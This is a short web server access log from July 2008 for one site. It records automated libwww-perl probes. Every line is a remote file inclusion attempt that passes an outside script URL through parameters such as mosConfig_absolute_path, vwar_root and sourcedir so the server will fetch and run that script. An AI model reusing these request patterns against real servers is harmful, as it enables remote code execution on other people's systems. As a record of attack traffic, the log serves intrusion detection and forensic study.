74.52.139.226 - - [29/Jul/2008:11:44:11 -0700] "GET /index.php?mosConfig_absolute_path=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 200 18431 "-" "libwww-perl/5.810" "www.dmulk.com"
208.43.121.242 - - [29/Jul/2008:11:44:13 -0700] "GET /logs/access_071224.log//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:44:17 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:44:19 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:44:22 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:44:24 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:44:44 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:44:49 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.65" "www.dmulk.com"
